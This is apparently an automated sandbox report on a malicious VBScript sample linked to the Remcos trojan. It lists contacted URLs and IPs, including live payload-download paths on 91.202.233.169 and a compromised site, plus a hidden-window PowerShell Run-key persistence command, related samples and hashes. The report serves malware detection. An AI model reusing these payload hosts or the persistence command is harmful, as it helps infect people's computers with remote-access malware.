00000009.00000002.3182605416.000001356CB84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000006.00000002.2089840253.0000027FDCCBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355DEC9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.informacionoportuna.com/wp-content/uploads/2024/	powershell.exe, 00000004.00000002.2090885360.00000155C52CA000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000009.00000002.2137458295.000001355E264000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://r11.o.lencr.org0#	powershell.exe, 00000021.00000002.3715892947.000001C054380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C88A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3715892947.000001C0543BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.informacionoportuna.com	powershell.exe, 00000004.00000002.2090885360.00000155C4FDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C3EB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0E90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C09E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CAA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C872000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.microsoft	powershell.exe, 00000014.00000002.3008770894.0000013DBA5E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000009.00000002.2137458295.000001355E264000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000004.00000002.2090885360.00000155C4C04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C09E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C2FC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://informacionoportuna.com	powershell.exe, 00000004.00000002.2090885360.00000155C52A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
HTTP://91.202.233.169/TAK/REG/MARZ/ENVS/DS1.TXT	powershell.exe, 00000004.00000002.2090885360.00000155C419D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C5553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C1151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CAF5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/License	powershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.169	powershell.exe, 00000004.00000002.2090885360.00000155C5553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C1151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CAF5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://r11.i.lencr.org/0=	powershell.exe, 00000021.00000002.3715892947.000001C054380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C88A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3715892947.000001C0543BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6	powershell.exe, 00000001.00000002.2712472865.0000015713145000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3100761973.0000013DBC208000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.informacionoportuna.com/wp-content/uploads/2024/09/dX	powershell.exe, 00000013.00000002.2417662894.00000240C089E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C281000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://wicroft.com	powershell.exe, 00000013.00000002.2411972909.00000240C032A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.informacionoportuna.com	powershell.exe, 00000004.00000002.2090885360.00000155C52A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000009.00000002.2137458295.000001355E264000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	powershell.exe, 00000021.00000002.3715892947.000001C054380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2742802158.000001C03A2BE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	powershell.exe, 00000021.00000002.3715892947.000001C054380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2742802158.000001C03A2BE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.2351244189.00000155D3D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C5662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2089840253.0000027FDD117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2257316904.0000027FEBA14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2257316904.0000027FEB8DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2475466595.000001BCA3A64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95166000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2475466595.000001BCA392E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355E2BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3182605416.000001356CB84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://oneget.orgX	powershell.exe, 00000006.00000002.2089840253.0000027FDCCBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355DEC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.HX	powershell.exe, 00000004.00000002.2090885360.00000155C5553000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.2712472865.000001571315A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C3C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2089840253.0000027FDB861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC938C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0439000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C044C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3100761973.0000013DBC230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2404669960.0000020A172F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2404669960.0000020A172DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2402946494.0000021F863E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2402946494.0000021F863C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2400633060.000001E127284000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2400633060.000001E12729D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03BE2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03BE18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2808818768.000001C60C1A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2808818768.000001C60C1B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2807757443.000001CFC052D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2807757443.000001CFC051F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2814694674.000002CE3076E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2712472865.000001571318C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C3C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2089840253.0000027FDB861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC938C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0423000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3100761973.0000013DBC25B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2404669960.0000020A17317000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2402946494.0000021F8648A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2400633060.000001E1272DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03BE16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2808818768.000001C60C1E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2807757443.000001CFC056A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://oneget.org	powershell.exe, 00000006.00000002.2089840253.0000027FDCCBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355DEC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.202.233.169	unknown	Russian Federation	9009	M247GB	true
15.235.85.194	informacionoportuna.com	United States	71	HP-INTERNET-ASUS	true
45.135.232.38	dcmxz.duckdns.org	Russian Federation	49392	ASBAXETNRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519308
Start date and time:	2024-09-26 10:56:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	sostener.vbs
Detection:	MAL
Classification:	mal100.troj.expl.evad.winVBS@68/59@5/3
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 100% Number of executed functions: 50 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 3872 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 7484 because it is empty
Execution Graph export aborted for target powershell.exe, PID 1120 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5776 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6572 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7996 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: sostener.vbs

Simulations

Behavior and APIs

Time	Type	Description
04:56:59	API Interceptor	285x Sleep call for process: powershell.exe modified
04:57:17	API Interceptor	1x Sleep call for process: RegSvcs.exe modified
10:57:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run _______________________------------- Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
10:57:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run _______________________------------- Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.202.233.169	sostener.vbs	Get hash	malicious	Remcos	Browse	91.202.233.169/Tak/Reg/Marz/SH/Rcm.txt
	sostener.vbs	Get hash	malicious	Remcos	Browse	91.202.233.169/Tak/Reg/Marz/ZQWER/PeF3Dir.txt
	envifa.vbs	Get hash	malicious	Remcos	Browse	91.202.233.169/Tak/Reg/Marz/ZQWER/PeF3Dir.txt
15.235.85.194	sostener.vbs	Get hash	malicious	Remcos	Browse
45.135.232.38	172698102496c864a187aff64295ab0b70d4e0148fc884b8fdef49a9c604553959f0c4197e421.dat-decoded.exe	Get hash	malicious	Remcos	Browse
	1726981024afb0b5261027cf8cb56ba2e74288f35f8a8f03f714e141da3004c24e1b6d3c16555.dat-decoded.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	decode_3c3a2e81bb9b9ea689c7c8d6aa9e24c0af55f3915e14295a64263688c83f4ab7.exe	Get hash	malicious	Remcos	Browse
	sostener.vbs	Get hash	malicious	Remcos	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dcmxz.duckdns.org	1726981024afb0b5261027cf8cb56ba2e74288f35f8a8f03f714e141da3004c24e1b6d3c16555.dat-decoded.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	45.135.232.38
bg.microsoft.map.fastly.net	HPDeskJet_043_SCAN.pdf	Get hash	malicious	Phisher	Browse	199.232.214.172
	https://pdftomuchmattersupdatings-vercel-app.translate.goog/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://linksapp.top:443	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://www.cognitoforms.com/f/elMiWbNXi0G8lOV9LA6SDg/1	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	http://tiktoksc.xyz/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://qwehikd-asdu.xyz/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://geminiqwc-sw.top/	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://tiktok1688.cc/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://qwoms-dei3.top/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://saihdqq-yadq.xyz/	Get hash	malicious	Unknown	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASBAXETNRU	#U0631#U0648#U0632 #U0633#U06cc#U0627#U0647 #U06a9#U0627#U0631#U06af#U0631.exe	Get hash	malicious	Unknown	Browse	194.87.45.14
	#U0641#U0631#U0627#U062e#U0648#U0627#U0646 #U0631#U0648#U0632 #U06a9#U0627#U0631#U06af#U0631.exe	Get hash	malicious	Unknown	Browse	194.87.45.14
	#U0631#U0648#U0632 #U0633#U06cc#U0627#U0647 #U06a9#U0627#U0631#U06af#U0631.exe	Get hash	malicious	Unknown	Browse	194.87.45.14
	#U0641#U0631#U0627#U062e#U0648#U0627#U0646 #U0631#U0648#U0632 #U06a9#U0627#U0631#U06af#U0631.exe	Get hash	malicious	Unknown	Browse	194.87.45.14
	172698102496c864a187aff64295ab0b70d4e0148fc884b8fdef49a9c604553959f0c4197e421.dat-decoded.exe	Get hash	malicious	Remcos	Browse	45.135.232.38
	1726981024afb0b5261027cf8cb56ba2e74288f35f8a8f03f714e141da3004c24e1b6d3c16555.dat-decoded.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	45.135.232.38
	SecuriteInfo.com.Linux.Siggen.9999.8861.1379.elf	Get hash	malicious	Mirai	Browse	212.196.169.14
	file.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	212.192.12.222
	http://104.219.233.181/fwd/P2Q9MjU2Mjc5JmVpPTcyODUyMjcyJmlmPTUxNDQyJm5kcD03OTgzJnNpPTE3JmxpPTIyMzcz	Get hash	malicious	Phisher	Browse	45.147.195.6
	decode_3c3a2e81bb9b9ea689c7c8d6aa9e24c0af55f3915e14295a64263688c83f4ab7.exe	Get hash	malicious	Remcos	Browse	45.135.232.38
M247GB	DRAFT BL - CLS930 KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exe	Get hash	malicious	XWorm	Browse	104.250.180.178
	6122.scr.exe	Get hash	malicious	Remcos	Browse	104.250.180.178
	6122.scr.exe	Get hash	malicious	Remcos	Browse	104.250.180.178
	DRAFT BL - CLS930 KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exe	Get hash	malicious	XWorm	Browse	104.250.180.178
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	91.202.233.158
	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	91.202.233.158
	SecuriteInfo.com.Linux.Siggen.9999.31454.15725.elf	Get hash	malicious	Unknown	Browse	158.46.140.169
	BNE400266900B - RLS SO# W317pdf.scr.exe	Get hash	malicious	Remcos	Browse	104.250.180.178
	BNE400266900A - BL NO.BNE400266900.pdf.scr.exe	Get hash	malicious	XWorm	Browse	104.250.180.178
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	91.202.233.158
HP-INTERNET-ASUS	sostener.vbs	Get hash	malicious	Remcos	Browse	15.235.85.194
	http://WWW.LUTHERANSONLINE.COM/SHALOMIC	Get hash	malicious	Unknown	Browse	15.235.211.177
	rsJtZBgpwG.elf	Get hash	malicious	Mirai	Browse	15.178.34.35
	https://jhgfurighiuhoisrfuu98rujerfhiu.pages.dev/coderogers.html	Get hash	malicious	HTMLPhisher	Browse	15.156.174.66
	Facturas de pago 003839,72011,030184.bat.exe	Get hash	malicious	AgentTesla	Browse	15.235.118.15
	https://credit.fb-business.com/	Get hash	malicious	Unknown	Browse	15.235.209.42
	http://t.yesware.com/tt/0ffd1f55c7e6a0ced56d29538e63fa334cce8cd2/340be3fbd5588b7ae8659d398f6ebdbe/6b6b3691935bcccf7dc7e5bf662a5dca/www.techcare.cl/pt/?conceicao.martins@cellnextelecom.pt	Get hash	malicious	Unknown	Browse	15.235.4.255
	Lista de embalaje y direcci#U00f3n de DHL.bat.exe	Get hash	malicious	AgentTesla	Browse	15.235.118.15
	D0F48A0632B6C451791F4257697E861961F06A6F.html	Get hash	malicious	Unknown	Browse	15.204.241.81
	firmware.i686.elf	Get hash	malicious	Unknown	Browse	15.157.89.240

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	sostener.vbs	Get hash	malicious	Remcos, PureLog Stealer	Browse	15.235.85.194
	sostener.vbs	Get hash	malicious	Remcos	Browse	15.235.85.194
	asegurar.vbs	Get hash	malicious	Remcos, PureLog Stealer	Browse	15.235.85.194
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	15.235.85.194
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	15.235.85.194
	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	15.235.85.194
	RFQ -PO.20571-0001-QBMS-PRQ-0200140.js	Get hash	malicious	AgentTesla, RedLine	Browse	15.235.85.194
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	15.235.85.194
	450230549.exe	Get hash	malicious	AgentTesla	Browse	15.235.85.194
	450230549.exe	Get hash	malicious	Unknown	Browse	15.235.85.194

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	28398
Entropy (8bit):	5.063590717663346
Encrypted:	false
SSDEEP:	768:TLbV3IpNBQkj2Uh4iUxkOZhxCardFvJOOdB8tAHkLNZzNKe1MlYo7YPU:TLbV3CNBQkj2Uh4iUxkOgqdJJOOdB8tu
MD5:	E489B959E14B529323FF0CFBF6CB9E56
SHA1:	B6150F38208711CD985C3434E62B37D1A71845B5
SHA-256:	AA30F61810AEE09A2FC4AEC7662809B7ADC47287FAF312DCFD0CF983B80AAE0E
SHA-512:	CE9985AFD0EB08BA7B4755735BCD609089040D8D59948C0776072C4A90B13C46FB8847A673E86A75777A0BEECF7C4E0EBAE53561AD8186F7A481EF57B48A39B6
Malicious:	false
Preview:	PSMODULECACHE.-...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr

File type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.3389756633800385
TrID:	Text - UTF-16 (LE) encoded (2002/1) 66.67% MP3 audio (1001/1) 33.33%
File name:	sostener.vbs
File size:	449'312 bytes
MD5:	7038e85f1e6e6405981b64ff58358482
SHA1:	9df67362f01d7a33a02a708fa6da1c3a1214fc51
SHA256:	a1a8e23d2f66e05da76366469a1a344973fb1d775a943656de0f90bf0306e447
SHA512:	e9bc9b726b17f8f513d36054647537d6e494bfb0087306ca52ca0f1f95785afa705ede98baaf71f19fead408f434a061a34ac6f0c457b0b77bdc51f93005c676
SSDEEP:	96:OffffUffffUfffflDXc7lYm8ky0xbFi1msE4VIAGYALFCN8V0bf:s7OlYm8kyIhi1msJVIAGYAZCN8qf
TLSH:	78A4123D9B42848C95B230478EAA16ACC99213783F8E7FA9836142D4647F739DF5CDE1
File Content Preview:	......'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.....'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 10:57:00.552860022 CEST	49901	53	192.168.2.5	1.1.1.1
Sep 26, 2024 10:57:00.825592041 CEST	53	49901	1.1.1.1	192.168.2.5
Sep 26, 2024 10:57:06.152964115 CEST	59120	53	192.168.2.5	1.1.1.1
Sep 26, 2024 10:57:07.154015064 CEST	59120	53	192.168.2.5	1.1.1.1
Sep 26, 2024 10:57:08.172272921 CEST	59120	53	192.168.2.5	1.1.1.1
Sep 26, 2024 10:57:10.162242889 CEST	53	59120	1.1.1.1	192.168.2.5
Sep 26, 2024 10:57:10.162262917 CEST	53	59120	1.1.1.1	192.168.2.5
Sep 26, 2024 10:57:10.162301064 CEST	53	59120	1.1.1.1	192.168.2.5
Sep 26, 2024 10:57:15.176388025 CEST	51876	53	192.168.2.5	1.1.1.1
Sep 26, 2024 10:57:15.824561119 CEST	53	51876	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
